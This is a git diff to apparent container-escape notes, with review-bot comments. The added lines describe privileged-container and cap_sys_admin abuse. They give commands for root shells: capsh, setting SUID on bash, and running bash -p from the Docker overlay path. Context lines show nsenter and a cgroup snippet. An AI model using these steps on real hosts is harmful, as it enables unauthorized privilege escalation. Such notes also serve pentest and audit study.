bump
This commit is contained in:
parent b15d5ea2ba
commit 840daf84da
@ -93,6 +93,9 @@ nsenter --target 1 --mount sh
```
## Misconfiguration
### capabilities
* Privileged container connect to the host directly, not through the docker engine
* Execution of bins on the host from libs inside the container is possible
```sh
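Review bot: the new `### capabilities` heading does not match the two bullets placed under it, which describe `--privileged` mode (direct access to the host, running host binaries) rather than any individual capability, and the ```sh block it now introduces is the pre-existing cgroup snippet (context line `sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"` in the next hunk). Consider renaming the heading to `### privileged` and adding one line stating which setting that snippet requires, so a reader auditing a deployment knows what to look for. Grammar: `* Privileged container connect to the host directly, not through the docker engine` should read `* A privileged container connects to the host directly, not through the Docker engine`, and `bins`/`libs` in the second bullet should be spelled out as binaries/libraries.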
@ -115,6 +118,19 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
* The file may appear outside the container on the host system
### cap_admin
`cap_sys_admin` provides the ability to spawn a root shell inside the container
```sh
capsh --gid=0 --uid=0 --
```
Further, if there is access to the host this capability can be used to set `chmod u+s /bin/bash` and list the available mounts. The mounts can be listed `findmnt`.
Resulting in a useable root bash on the host via executing it on the path of the docker volume, e.g.
```sh
/var/lib/docker/overlay2/l/randomhash/bin/bash -p
```
## Check fdisk
* `fdisk -l` and `lsblk`, host bulk device may be exposed
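Review bot: the heading `### cap_admin` does not match the capability named in the paragraph below it, `cap_sys_admin`; use the same name in both. The `capsh --gid=0 --uid=0 --` snippet does not demonstrate CAP_SYS_ADMIN: changing uid/gid with capsh depends on CAP_SETUID/CAP_SETGID, and if the process is already root inside the container it changes nothing, so either name the capability that sentence actually relies on or drop the snippet. The `Further, if there is access to the host ...` paragraph should say explicitly on which side each step happens (where `chmod u+s /bin/bash` is run versus where `findmnt` and `bin/bash -p` are run) and is missing a word: `The mounts can be listed with findmnt`. `randomhash` in `/var/lib/docker/overlay2/l/randomhash/bin/bash -p` should be marked as a placeholder, e.g. `<layer-id>`. Spelling: `useable` should be `usable`, and under `## Check fdisk` the bullet `host bulk device may be exposed` should read `host block device may be exposed`.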